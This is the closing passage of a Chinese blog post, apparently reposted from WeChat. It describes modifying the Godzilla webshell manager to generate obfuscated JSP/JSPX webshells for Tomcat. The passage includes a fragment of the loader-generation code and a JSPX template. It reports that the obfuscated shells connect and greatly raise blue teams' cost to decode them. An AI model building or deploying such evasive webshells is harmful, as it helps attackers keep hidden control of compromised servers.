} } return data;}public static byte[] GenerateShellLoder(String pass, String secretKey, boolean isBin) throws Exception { return GenerateShellLoder("", pass, secretKey, isBin);}}//shell.jsp_obf文件的内容即:jspx格式的模板<jsp:root xmlns:jsp="[http://java.sun.com/JSP/Page"](http://java.sun.com/JSP/Page") version="1.2"><jsp:declaration>{globalCode}</jsp:declaration><jsp:scriptlet>{code}</jsp:scriptlet><jsp:text></jsp:text></jsp:root>
10
二开代码的编译后,木马生成与webshell连接测试

编译后的木马生成界面以及能够生成的混淆webshell的功能选项如下:

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

经测试,混淆后的webshell均可连接成功,部分混淆的效果如下

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

混淆后的代码能够极大地增加蓝队的解密/还原代码的成本,连接测试,如下举例

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

11
总结

此次webshell混淆开发的学习总结:

  • 这次二开所涉及的思路并非新技术,而是将一些已经公开的思路,技术,尝试武器化落地集成到godzilla里面,剩下的都是开发的体力活还有一些常见代码问题排查。

  • 无论是tomcat混淆或者是代码层的混淆,都只能增加蓝队的解密/还原代码的成本。tomcat混淆更偏向于代码不可读,代码层混淆更偏向于代码的可读性差。

  • 无论是yzddMr6师傅的议题、y4tracker的文章或者是jspencounter项目,在本次Godzilla二开中都是非常重要的参考。

不足之处在于:代码实现起来较粗糙&还未能在开发时想到一些更有意思的代码混淆的搭配/思路?

以上关键代码已贴出,可参考实现混淆,完整的学习demo.jar稍后放到知识星球!安全路远,交个朋友?

哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

原文始发于微信公众号(赛博大作战):哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月12日00:13:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆https://cn-sec.com/archives/2488925.html

发表评论

匿名网友 填写信息